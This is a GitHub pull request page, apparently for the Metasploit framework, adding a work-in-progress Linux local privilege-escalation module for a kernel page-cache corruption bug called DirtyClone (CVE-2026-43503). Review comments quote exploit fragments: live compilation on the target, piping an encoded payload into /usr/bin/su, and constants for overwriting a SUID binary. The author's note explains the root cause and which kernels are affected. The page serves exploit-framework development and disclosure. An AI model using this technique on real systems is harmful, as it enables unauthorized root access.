Adds module for DirtyClone variant (CVE-2026-43503)#21613
Open
eipoverflow wants to merge 5 commits into
Open
Conversation
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
Contributor
There was a problem hiding this comment.
Pull request overview
Adds a new (WIP) Linux local privilege escalation exploit module for a DirtyClone/DirtyFrag-family page-cache write vulnerability (CVE-2026-43503), along with the corresponding C exploit source stored under data/exploits/.
Changes:
- Introduces a new local exploit module scaffold (
dirtyclone_cve_2026_43503) wired for live-compilation of a C exploit. - Adds a C proof-of-concept exploit that targets
/usr/bin/suvia an ESP-in-UDP/XFRM-driven page-cache corruption technique.
Impact Analysis:
- Blast radius: medium; affects only users who run this new module and any target systems it is executed against (local privilege escalation path).
- Data and contract effects: none identified; no schema/payload contracts changed, but the exploit path can corrupt a SUID binary in page cache.
- Rollback and test focus: rollback is straightforward (remove the new module + data file); highest-value validation is (1)
checkaccuracy (no false positives), (2) successful payload execution path, and (3) behavior when live compilation is disabled.
Reviewed changes
Copilot reviewed 2 out of 3 changed files in this pull request and generated 8 comments.
| File | Description |
|---|---|
| modules/exploits/linux/local/dirtyclone_cve_2026_43503.rb | Adds the new local exploit module (currently WIP; check/payload/option handling needs work). |
| data/exploits/CVE-2026-43503/cve-2026-43503.c | Adds the C exploit source used by the module (currently hardcodes /usr/bin/su). |
Comment on lines
+93
to
+102
| if live_compile? | ||
| exploit_c = exploit_data("CVE-2026-43503", "cve-2026-43503.c") | ||
| vprint_status("Compiling exploit live on target") | ||
| upload_and_compile(exploit_file, exploit_c) | ||
| vprint_status("Exploit in #{exploit_file}") | ||
| end | ||
|
|
||
| exploit_response = cmd_exec("#{exploit_file} -v") | ||
|
|
||
| vprint_status("#{exploit_response}") |
|
|
||
| vprint_status("#{exploit_response}") | ||
|
|
||
| cmd_exec("echo -n #{Base64.strict_encode64(payload.encoded)} | base64 -d | /usr/bin/su") |
Comment on lines
+75
to
+77
| def check | ||
| CheckCode::Appears("Target is vulnerable") | ||
| end |
Comment on lines
+34
to
+38
| 'Name' => 'Sample Linux Priv Esc', | ||
| 'Description' => %q{ | ||
| This exploit module illustrates how a vulnerability could be exploited | ||
| in an linux command for priv esc. | ||
| }, |
Comment on lines
+50
to
+53
| 'References' => [ | ||
| [ 'URL', 'http://www.example.com'], | ||
| [ 'CVE', '2026-43503'] | ||
| ], |
Comment on lines
+64
to
+73
| register_advanced_options [ | ||
| OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]), | ||
| OptString.new('SUID_BINARY_PATH', [ true, '', '/usr/bin/su' ]) | ||
| ] | ||
| end | ||
|
|
||
| # Simplify pulling the writable directory variable | ||
| def base_dir | ||
| datastore['WRITABLEDIR'].to_s | ||
| end |
Comment on lines
+37
to
+43
| #define ENC_PORT 4500 | ||
| #define SEQ_VAL 200 | ||
| #define REPLAY_SEQ 100 | ||
| #define TARGET_PATH "/usr/bin/su" | ||
| #define PATCH_OFFSET 0 /* Overwrite the whole ELF starting at file[0]. */ | ||
| #define PAYLOAD_LEN 192 /* Bytes of shell_elf to write (48 triggers). */ | ||
| #define ENTRY_OFFSET 0x78 /* Shellcode entry inside the new ELF. */ |
Comment on lines
+6
to
+8
| class MetasploitModule < Msf::Exploit::Local | ||
| Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html | ||
|
|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Additional member of family bigger than Culkin family. Adds module for DirtyClone vulnerability (CVE-2026-43503), which is a variant of DirtyFrag vulnerability. DirtyClone is a Linux kernel local privilege escalation vulnerability
related to the DirtyFrag family of page-cache corruption bugs. The root cause is in
__pskb_copy_fclone(): when the xt_TEE netfilter target clones an ESP-in-UDP packet,the clone has the
SKBFL_SHARED_FRAGflag stripped. This causesesp_input()todecrypt the clone's payload in-place, directly mutating the page-cache page that was
spliced into the packet — even if that page backs a read-only or immutable on-disk file
(e.g. a setuid binary). The on-disk file is left unchanged while the corrupted in-memory
view is immediately visible to all processes reading from the page cache.
Kernel versions up to 7.1-rc4 are vulnerable. The fix landed in 7.1-rc5.